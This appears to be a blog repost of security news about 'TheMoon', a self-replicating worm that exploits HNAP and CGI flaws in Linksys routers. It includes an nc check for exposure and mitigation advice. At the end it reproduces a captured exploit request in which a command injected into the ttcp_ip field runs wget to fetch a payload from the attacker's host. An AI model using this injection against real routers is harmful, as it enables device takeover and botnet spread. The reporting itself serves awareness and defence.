Linksys routers infects with self-replicating malware

Linksys Malware Spreading from Router to Router

Hello everyone, I'm here to explain how new malware that in found in linksys router is being spreading everywhere. Some 1,000 devices have been hit by the worm, which seeks out others to infect. So here is my complete details about. here we go

Researchers say they have uncovered an ongoing attack that infects home and small-office wireless routers from Linksys with self-replicating malware, most likely by exploiting a code-execution vulnerability in the device firmware.

Which Wireless Router do you have at your Home or Office? If it’s a Linksys Router you could be in the danger to a new malware that attacks your firmware and replicates itself.

Security researcher Johannes B. Ullrich from the SANS Technology Institute has warned about a self-replicating malware which is exploiting authentication bypass and code-execution vulnerabilities in theLinksys wireless routers.

The Malware named as ‘THE MOON’, scans for other vulnerable devices to spread from router to router and Johannes confirmed that the malicious worm has already infected around 1,000 Linksys E1000, E1200, and E2400 routers.

"We do not know for sure if there is a command and control channel yet," Ullrich wrote in the update. "But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm."

In order to hack the Router, malware remotely calls the Home Network Administration Protocol (HNAP), allows identification, configuration and management of networking devices.

The Malware first request the model and firmware version of the router using HNAP and if the device founds vulnerable, it sends a CGI script exploit to get the local command execution access to the device.

Linksys's parent company Belkin has confirmed that HNAP1 implementation has a security flaw whoseexploit code is publicly available on the Internet.

“There are about 670 different IP ranges that it scans for other routers. They appear to all belong to different cable modem and DSL ISPs. They are distributed somewhat worldwide),”

‘To what extent this worm can be dangerous’ is yet a question.

“We are still working on analysis what it exactly does. But so far, it looks like all it does is spread (which is why we call it a worm). It may have a ‘call-home’ feature that will report back when it infected new hosts.”

To verify that your device is vulnerable or not, use following command (depending on your OS):

echo [-e] “GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n” | nc routerip 8080

If you receive an XML HNAP reply, you are likely to be victimized for the worm affecting Linksys devices and some preventive measures are to be taken. Also keep an eye on the logs of port 80 and 8080.

Users are recommended to Disable Remote Administration of their device or limits the administration right to a limited number of trusted IP addresses.

bandwidth Consuming 

The worm came to light earlier this week after the operator of a Wyoming ISP contacted Sans and reported a large number of customers with compromised Linksys routers. As the routers scanned IP ports 80 and 8080 as fast as they could, they consumed the bandwidth of the unidentified ISP's customers, slowed down their legitimate activity, and interrupted streams and VPN connections.

The security exploit that's used by the worm will work on all current and recent Linksys routers, including the entire E-series as well as Valet routers and some with "WRT" part numbers (for example, the WRT160). However, this particular worm seems to focus on the E-series and appears to be aimed at marshaling a botnet. So far, it does not appear that the malware flashes itself in, so it can be removed by a reboot. But it appears that any router with stock firmware that's exposed to the Internet can be reinfected even if it has a secure password.

The initial request in the attack typically begins with the strings "GET /HNAP1/ HTTP/1.1" and then "Host: [ip of host]:8080." The following requests look like this:

POST /[withheld].cgi HTTP/1.1
Host: [ip of honeypot]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ip of honeypot]:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH

When decoded, the request is translated to:

submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
    `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`
&StartEPI=1